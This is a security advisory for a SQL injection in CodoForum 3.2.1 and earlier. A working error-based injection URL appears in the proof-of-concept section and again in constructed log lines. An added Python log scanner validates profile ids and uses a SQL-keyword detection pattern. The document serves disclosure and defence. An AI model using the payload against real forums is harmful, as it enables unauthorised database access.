1. Advisory Information
========================================
Title                : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage      : https://codoforum.com/
Remotely Exploitable : Yes
Versions Affected    : Prior to 3.2.1
Tested on            : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability        : SQL Injection (Critical/High)
Date                 : 23.07.2016
Author               : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)

2. CREDIT
========================================
This vulnerability was identified during a penetration test by Yakir Wizman.

3. Description
========================================
The script that parses the request URL and displays a user profile based on the retrieved id does not properly validate that id against SQL injection.

4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching the current database user (via CURRENT_USER()):

http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))

5. SOLUTION
========================================
Upgrade to the latest version, v3.4 build 19.
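The description says the profile id taken from the u=/user/profile/<id> route is never validated. The following added example (not from the advisory or from CodoForum) shows the missing allow-list check on that id segment and uses it to flag suspicious profile requests in Apache access-log lines; the log lines are constructed, and the first one reuses the advisory's proof-of-concept URL.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache access-log lines (not taken from the advisory). The first
# reuses the advisory's proof-of-concept URL, the second is a normal profile
# view, the third is a malformed id that made the backend answer 500.
SAMPLE_LOG = '''
203.0.113.5 - - [23/Jul/2016:10:00:01 +0000] "GET /forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1" 200 5120
203.0.113.9 - - [23/Jul/2016:10:00:02 +0000] "GET /forum/index.php?u=/user/profile/42 HTTP/1.1" 200 4096
203.0.113.9 - - [23/Jul/2016:10:00:03 +0000] "GET /forum/index.php?u=/user/profile/42' HTTP/1.1" 500 312
'''.strip()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"\S+ (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$')
PROFILE_RE = re.compile(r'^/user/profile/(?P<id>.+)$', re.DOTALL)
# Tokens that have no business inside a numeric profile id.
SQL_HINT_RE = re.compile(r"(?i)\b(select|union|and|or|if)\b|'|--|/\*")

def is_valid_profile_id(raw: str) -> bool:
    """Allow-list check for the id segment (digits only). This is the kind of
    validation the advisory says the profile script lacks; hypothetical, not
    CodoForum's code."""
    return re.fullmatch(r'[0-9]{1,10}', raw) is not None

def profile_id(target: str):
    """Extract the raw <id> from index.php?u=/user/profile/<id>, else None."""
    parsed = urlparse(target)
    if not parsed.path.endswith('/index.php'):
        return None
    u_values = parse_qs(parsed.query).get('u')  # parse_qs percent-decodes
    if not u_values:
        return None
    m = PROFILE_RE.match(u_values[0])
    return m.group('id') if m else None

def scan_log(text: str):
    """Return one finding per profile request whose id is not a plain integer."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_id = profile_id(m.group('target'))
        if raw_id is None or is_valid_profile_id(raw_id):
            continue
        findings.append({'ip': m.group('ip'), 'status': m.group('status'),
                         'id': raw_id, 'sql_hint': bool(SQL_HINT_RE.search(raw_id))})
    return findings
```

A 500 response paired with a non-numeric id (third line) is the error-based probing pattern worth alerting on even when no SQL keyword is present.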